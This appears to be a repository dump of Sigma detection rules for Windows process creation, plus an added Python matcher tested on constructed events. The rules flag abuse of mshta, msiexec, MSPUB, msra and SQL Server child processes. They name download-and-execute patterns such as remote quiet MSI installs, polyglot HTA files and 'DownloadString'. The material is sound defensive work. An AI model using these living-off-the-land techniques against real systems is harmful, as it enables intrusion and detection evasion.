    "content": "title: MSHTA Execution with Suspicious File Extensions\nid: cc7abbd0-762b-41e3-8a26-57ad50d2eea3\nstatus: test\ndescription: |\n    Detects execution of mshta.exe with file types that do not typically represent HTA (HTML Application) content,\n    such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications\n    containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and\n    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.\nreferences:\n    - http://blog.sevagas.com/?Hacking-around-HTA-files\n    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script\n    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997\n    - https://twitter.com/mattifestation/status/1326228491302563846\n    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c\nauthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-02-22\nmodified: 2025-05-12\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.t1218.005\n    - attack.execution\n    - attack.t1059.007\n    - cve.2020-1599\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'mshta.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.7z'\n            - '.avi'\n            - '.bat'\n            - '.bmp'\n            - '.conf'\n            - '.csv'\n            - '.dll'\n            - '.doc'\n            - '.gif'\n            - '.gz'\n            - '.ini'\n            - '.jpe'\n            - '.jpg'\n            - '.json'\n            - '.lnk'\n            - '.log'\n            - '.mkv'\n            - '.mp3'\n            - '.mp4'\n            - '.pdf'\n            - '.png'\n            - '.ppt'\n            - '.rar'\n            - '.rtf'\n            - '.svg'\n            - '.tar'\n            - '.tmp'\n            - '.txt'\n            - '.xls'\n            - '.xml'\n            - '.yaml'\n            - '.yml'\n            - '.zip'\n            - 'vbscript'\n            # - '.chm'  # could be prone to false positives\n            # - '.exe'\n    condition: all of selection_*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml",
    "content": "title: Suspicious Mshta.EXE Execution Patterns\nid: e32f92d1-523e-49c3-9374-bdb13b46a3ba\nstatus: test\ndescription: Detects suspicious mshta process execution patterns\nreferences:\n    - https://en.wikipedia.org/wiki/HTML_Application\n    - https://www.echotrail.io/insights/search/mshta.exe\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-17\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'MSHTA.EXE'\n    selection_susp:\n        # Suspicious parents\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n        # Suspicious folders\n        CommandLine|contains:\n            - '\\AppData\\Local\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Temp\\'\n    filter_img:\n        # Filter legit Locations\n        - Image|startswith:\n              - 'C:\\Windows\\System32\\'\n              - 'C:\\Windows\\SysWOW64\\'\n        # Suspicious extensions\n        - CommandLine|contains:\n              - '.htm'\n              - '.hta'\n        # Filter simple execution\n        - CommandLine|endswith:\n              - 'mshta.exe'\n              - 'mshta'\n    condition: all of selection_* or (selection_img and not filter_img)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_dll.yml",
    "content": "title: DllUnregisterServer Function Call Via Msiexec.EXE\nid: 84f52741-8834-4a8c-a413-2eb2269aa6c8\nstatus: test\ndescription: Detects MsiExec loading a DLL and calling its DllUnregisterServer function\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/\n    - https://twitter.com/_st0pp3r_/status/1583914515996897281\nauthor: frack113\ndate: 2022-04-24\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: 'msiexec.exe'\n    selection_flag:\n        CommandLine|contains|windash: ' -z '\n    selection_dll:\n        CommandLine|contains: '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml",
    "content": "title: Suspicious MsiExec Embedding Parent\nid: 4a2a2c3e-209f-4d01-b513-4155a540b469\nstatus: test\ndescription: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nauthor: frack113\ndate: 2022-04-16\nmodified: 2022-07-14\ntags:\n    - attack.t1218.007\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n        ParentCommandLine|contains|all:\n            - 'MsiExec.exe'\n            - '-Embedding '\n    filter_splunk_ufw:\n        Image|endswith: ':\\Windows\\System32\\cmd.exe'\n        CommandLine|contains: 'C:\\Program Files\\SplunkUniversalForwarder\\bin\\'\n    filter_vs:\n        - CommandLine|contains: '\\DismFoDInstall.cmd'\n        - ParentCommandLine|contains|all:\n              - '\\MsiExec.exe -Embedding '\n              - 'Global\\MSI0000'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml",
    "content": "title: Suspicious Msiexec Execute Arbitrary DLL\nid: 6f4191bb-912b-48a8-9ce7-682769541e6d\nstatus: test\ndescription: |\n    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\n    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\n    - https://twitter.com/_st0pp3r_/status/1583914515996897281\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msiexec.exe'\n        CommandLine|contains|windash: ' -y'\n    filter_apple:\n        CommandLine|contains:\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\'\n            - '\\MsiExec.exe\" /Y C:\\Windows\\CCM\\' # also need non-quoted execution\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\'\n            - '\\MsiExec.exe\" -Y C:\\Windows\\CCM\\' # also need non-quoted execution\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml",
    "content": "title: Msiexec Quiet Installation\nid: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5\nstatus: test\ndescription: |\n    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\n    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\n    - https://twitter.com/_st0pp3r_/status/1583914244344799235\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: 'msiexec.exe'\n    selection_cli:\n        # Note that there is no space before and after the arguments because it's possible to write a commandline as such\n        # Example: msiexec -q/i [MSI Package]\n        CommandLine|contains|windash:\n            - '-i'\n            - '-package'\n            - '-a'\n            - '-j'\n    selection_quiet:\n        CommandLine|contains|windash: '-q'\n    filter_user_temp:\n        # The %temp% is a very common location for installers\n        ParentImage|startswith: 'C:\\Users\\'\n        ParentImage|contains: '\\AppData\\Local\\Temp\\'\n    filter_system_temp:\n        ParentImage|startswith: 'C:\\Windows\\Temp\\'\n    filter_ccm:\n        ParentImage: 'C:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - WindowsApps installing updates via the quiet flag\nlevel: medium\n"
  },
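The msiexec rules above rely on the `windash` modifier so that `-q` also matches `/q` and the Unicode dash forms, and the mshta pattern rule combines `all of selection_*` with a `selection_img and not filter_img` branch. The Python block below is an added example, not code from the Sigma project or its tooling: it implements the handful of string modifiers these rules use, hand-translates the conditions of `Msiexec Quiet Installation` and `Suspicious Mshta.EXE Execution Patterns`, and runs them over constructed process-creation events. The dash character set expanded by `windash` and the event contents are assumptions made for the example.

```python
# Added example, not code from the Sigma project: a minimal matcher for the
# string modifiers these process_creation rules use, run over constructed
# events. Field names follow Sigma's process_creation taxonomy; the events and
# the two hand-translated conditions are this example's own.
import itertools

# Assumption about windash: it permutes '-' and '/' together with the Unicode
# dashes (en dash, em dash, horizontal bar); check the Sigma specification.
DASH_CHARS = ("-", "/", "\u2013", "\u2014", "\u2015")

OPS = {
    "equals": lambda actual, v: actual == v,
    "endswith": lambda actual, v: actual.endswith(v),
    "startswith": lambda actual, v: actual.startswith(v),
    "contains": lambda actual, v: v in actual,
}


def windash(value):
    """Every variant of value with each dash/slash position swapped."""
    positions = [i for i, ch in enumerate(value) if ch in DASH_CHARS]
    variants = []
    for combo in itertools.product(DASH_CHARS, repeat=len(positions)):
        chars = list(value)
        for pos, repl in zip(positions, combo):
            chars[pos] = repl
        variants.append("".join(chars))
    return variants


def match(ev, spec, values):
    """Evaluate one 'Field|modifier|...' line of a Sigma selection against ev.
    Matching is case-insensitive; listed values are OR-ed unless 'all' is set."""
    field, *mods = spec.split("|")
    op = next((m for m in mods if m in OPS), "equals")
    values = [values] if isinstance(values, str) else list(values)
    if "windash" in mods:
        values = [w for v in values for w in windash(v)]
    actual = str(ev.get(field, "")).lower()
    hits = [OPS[op](actual, v.lower()) for v in values]
    return all(hits) if "all" in mods else any(hits)


def msiexec_quiet_installation(ev):
    """'Msiexec Quiet Installation': all of selection_* and not 1 of filter_*"""
    selection_img = match(ev, "Image|endswith", "\\msiexec.exe") or match(ev, "OriginalFileName", "msiexec.exe")
    selection_cli = match(ev, "CommandLine|contains|windash", ["-i", "-package", "-a", "-j"])
    selection_quiet = match(ev, "CommandLine|contains|windash", "-q")
    filter_user_temp = match(ev, "ParentImage|startswith", "C:\\Users\\") and match(ev, "ParentImage|contains", "\\AppData\\Local\\Temp\\")
    filter_system_temp = match(ev, "ParentImage|startswith", "C:\\Windows\\Temp\\")
    filter_ccm = match(ev, "ParentImage", "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") and match(ev, "IntegrityLevel", ["System", "S-1-16-16384"])
    return all([selection_img, selection_cli, selection_quiet]) and not any([filter_user_temp, filter_system_temp, filter_ccm])


def mshta_suspicious_patterns(ev):
    """'Suspicious Mshta.EXE Execution Patterns': all of selection_* or (selection_img and not filter_img)"""
    selection_img = match(ev, "Image|endswith", "\\mshta.exe") or match(ev, "OriginalFileName", "MSHTA.EXE")
    selection_susp = (match(ev, "ParentImage|endswith", ["\\cmd.exe", "\\cscript.exe", "\\powershell.exe", "\\pwsh.exe",
                                                        "\\regsvr32.exe", "\\rundll32.exe", "\\wscript.exe"])
                      and match(ev, "CommandLine|contains", ["\\AppData\\Local\\", "C:\\ProgramData\\", "C:\\Users\\Public\\", "C:\\Windows\\Temp\\"]))
    filter_img = (match(ev, "Image|startswith", ["C:\\Windows\\System32\\", "C:\\Windows\\SysWOW64\\"])
                  or match(ev, "CommandLine|contains", [".htm", ".hta"])
                  or match(ev, "CommandLine|endswith", ["mshta.exe", "mshta"]))
    return (selection_img and selection_susp) or (selection_img and not filter_img)


# Constructed events (not real telemetry).
EVENTS = [
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "msiexec.exe /q /i \\\\fileserver\\share\\update.msi"},
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe",
     "CommandLine": "msiexec.exe /q /i C:\\Users\\alice\\AppData\\Local\\Temp\\vendor.msi"},
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "msiexec.exe \u2013q \u2013i C:\\ProgramData\\a.msi"},          # en dashes
    {"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "mshta.exe C:\\Users\\Public\\payload.txt"},
    {"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Program Files\\Vendor\\tool.hta\""},
    {"Image": "C:\\Users\\bob\\Downloads\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "C:\\Users\\bob\\Downloads\\mshta.exe http://example.invalid/x.png"},
]

RULES = {"msiexec_quiet_installation": msiexec_quiet_installation,
         "mshta_suspicious_patterns": mshta_suspicious_patterns}


def evaluate(events=EVENTS):
    """Map each rule name to the indexes of the events it fires on."""
    return {name: [i for i, ev in enumerate(events) if rule(ev)] for name, rule in RULES.items()}


if __name__ == "__main__":
    for name, hits in evaluate().items():
        print(name, hits)
```

Event 1 is suppressed by `filter_user_temp`, event 2 fires only because `windash` expands `-q` and `-i` to the en-dash forms, event 4 is dropped by the System32 path filter, and event 5 (mshta copied to a Downloads folder and given a non-HTA argument) is caught by the `selection_img and not filter_img` branch rather than by the suspicious-parent branch.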
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml",
    "content": "title: Suspicious Msiexec Quiet Install From Remote Location\nid: 8150732a-0c9d-4a99-82b9-9efb9b90c40c\nrelated:\n    - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f\n      type: similar\nstatus: test\ndescription: Detects usage of Msiexec.exe to quietly install packages hosted at a remote location (HTTP URL or UNC path)\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-28\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: 'msiexec.exe'\n    selection_cli:\n        # Note that there is no space before and after the arguments because it's possible to write a commandline as such\n        # Example: msiexec -q/i [MSI Package]\n        CommandLine|contains|windash:\n            - '-i'\n            - '-package'\n            - '-a'\n            - '-j'\n    selection_quiet:\n        CommandLine|contains|windash: '-q'\n    selection_remote:\n        CommandLine|contains:\n            - 'http'\n            - '\\\\\\\\'\n    filter_optional_openoffice:\n        CommandLine|contains|all:\n            - '\\AppData\\Local\\Temp\\OpenOffice'\n            - 'Installation Files\\openoffice'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml",
    "content": "title: Potential MsiExec Masquerading\nid: e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144\nstatus: test\ndescription: Detects the execution of msiexec.exe from an uncommon directory\nreferences:\n    - https://twitter.com/200_okay_/status/1194765831911215104\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-11-14\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: 'msiexec.exe'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml",
    "content": "title: MsiExec Web Install\nid: f7b5f842-a6af-4da5-9e95-e32478f3cd2f\nrelated:\n    - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c\n      type: similar\nstatus: test\ndescription: Detects suspicious msiexec process starts with web addresses as parameter\nreferences:\n    - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-09\nmodified: 2022-01-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' msiexec'\n            - '://'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msix_ai_stub_execution.yml",
    "content": "title: Windows MSIX Package Support Framework AI_STUBS Execution\nid: af5732ed-764e-489d-826d-0447c8b36242\nstatus: experimental\ndescription: |\n    Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'.\n    This activity may indicate malicious MSIX packages built with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions.\nreferences:\n    - https://redcanary.com/blog/threat-intelligence/msix-installers/\n    - https://redcanary.com/threat-detection-report/techniques/installer-packages/\n    - https://learn.microsoft.com/en-us/windows/msix/package/package-support-framework\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\n    - attack.t1553.005\n    - attack.t1204.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\AI_STUBS\\AiStubX64Elevated.exe'\n            - '\\AI_STUBS\\AiStubX86Elevated.exe'\n            - '\\AI_STUBS\\AiStubX64.exe'\n            - '\\AI_STUBS\\AiStubX86.exe'\n        OriginalFileName: 'popupwrapper.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate applications packaged with Advanced Installer using Package Support Framework\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msohtmed_download.yml",
    "content": "title: Arbitrary File Download Via MSOHTMED.EXE\nid: 459f2f98-397b-4a4a-9f47-6a5ec2f1c69d\nstatus: test\ndescription: Detects usage of \"MSOHTMED\" to download arbitrary files\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\MSOHTMED.exe'\n        - OriginalFileName: 'MsoHtmEd.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mspub_download.yml",
    "content": "title: Arbitrary File Download Via MSPUB.EXE\nid: 3b3c7f55-f771-4dd6-8a6e-08d057a17caf\nstatus: test\ndescription: Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\MSPUB.exe'\n        - OriginalFileName: 'MSPUB.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msra_process_injection.yml",
    "content": "title: Potential Process Injection Via Msra.EXE\nid: 744a188b-0415-4792-896f-11ddb0588dbc\nstatus: test\ndescription: Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. Msra.exe has been abused by many threat actors as an injection target for discovery and persistence activity\nreferences:\n    - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n    - https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf\nauthor: Alexander McDonald\ndate: 2022-06-24\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\msra.exe'\n        ParentCommandLine|endswith: 'msra.exe'\n        Image|endswith:\n            - '\\arp.exe'\n            - '\\cmd.exe'\n            - '\\net.exe'\n            - '\\netstat.exe'\n            - '\\nslookup.exe'\n            - '\\route.exe'\n            - '\\schtasks.exe'\n            - '\\whoami.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Msra.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml",
    "content": "title: Detection of PowerShell Execution via Sqlps.exe\nid: 0152550d-3a26-4efd-9f0e-54a0b28ae2f3\nstatus: test\ndescription: |\n  This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server.\n  Script blocks are not logged in this case, so this utility can be used to bypass protection mechanisms based on the analysis of these logs.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\n    - https://twitter.com/bryon_/status/975835709587075072\nauthor: 'Agro (@agro_sev) oscd.community'\ndate: 2020-10-10\nmodified: 2022-12-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\sqlps.exe'\n    selection_image:\n        - Image|endswith: '\\sqlps.exe'\n        - OriginalFileName: 'sqlps.exe'\n    filter_image:\n        ParentImage|endswith: '\\sqlagent.exe'\n    condition: selection_parent or (selection_image and not filter_image)\nfalsepositives:\n    - Direct PS command execution through SQLPS.exe is uncommon; a child sqlps.exe process spawned by sqlagent.exe is a legitimate action.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml",
    "content": "title: SQL Client Tools PowerShell Session Detection\nid: a746c9b8-a2fb-4ee5-a428-92bee9e99060\nstatus: test\ndescription: |\n  This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio.\n  Script blocks are not logged in this case, so this utility can be used to bypass protection mechanisms based on the analysis of these logs.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml\n    - https://twitter.com/pabraeken/status/993298228840992768\nauthor: 'Agro (@agro_sev) oscd.community'\ndate: 2020-10-13\nmodified: 2022-02-25\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\sqltoolsps.exe'\n        - ParentImage|endswith: '\\sqltoolsps.exe'\n        - OriginalFileName: 'sqltoolsps.exe'\n    filter:\n        ParentImage|endswith: '\\smss.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Direct PS command execution through SQLToolsPS.exe is uncommon; a child sqltoolsps.exe process spawned by smss.exe is a legitimate action.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml",
    "content": "title: Suspicious Child Process Of SQL Server\nid: 869b9ca7-9ea2-4a5a-8325-e80e62f75445\nrelated:\n    - id: 344482e4-a477-436c-aa70-7536d18a48c7\n      type: obsolete\nstatus: test\ndescription: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.\nreferences:\n    - Internal Research\nauthor: FPT.EagleEye Team, wagga\ndate: 2020-12-11\nmodified: 2023-05-04\ntags:\n    - attack.t1505.003\n    - attack.t1190\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sqlservr.exe'\n        Image|endswith:\n            # You can add other uncommon or suspicious processes\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\netstat.exe'\n            - '\\nltest.exe'\n            - '\\ping.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\sh.exe'\n            - '\\systeminfo.exe'\n            - '\\tasklist.exe'\n            - '\\wsl.exe'\n    filter_optional_datev:\n        ParentImage|startswith: 'C:\\Program Files\\Microsoft SQL Server\\'\n        ParentImage|endswith: 'DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe'\n        Image: 'C:\\Windows\\System32\\cmd.exe'\n        CommandLine|startswith: '\"C:\\Windows\\system32\\cmd.exe\" '\n    condition: selection and not 1 of filter_optional_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml",
    "content": "title: Suspicious Child Process Of Veeam Database\nid: d55b793d-f847-4eea-b59a-5ab09908ac90\nrelated:\n    - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445\n      type: similar\nstatus: test\ndescription: Detects suspicious child processes of the SQL Server process backing the Veeam database (instance name containing VEEAMSQL). This could indicate potential RCE or SQL Injection.\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\sqlservr.exe'\n        ParentCommandLine|contains: 'VEEAMSQL'\n    selection_child_1:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wsl.exe'\n            - '\\wt.exe'\n        CommandLine|contains:\n            - '-ex '\n            - 'bypass'\n            - 'cscript'\n            - 'DownloadString'\n            - 'http://'\n            - 'https://'\n            - 'mshta'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wscript'\n            - 'copy '\n    selection_child_2:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netstat.exe'\n            - '\\nltest.exe'\n            - '\\ping.exe'\n            - '\\tasklist.exe'\n            - '\\whoami.exe'\n    condition: selection_parent and 1 of selection_child_*\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml",
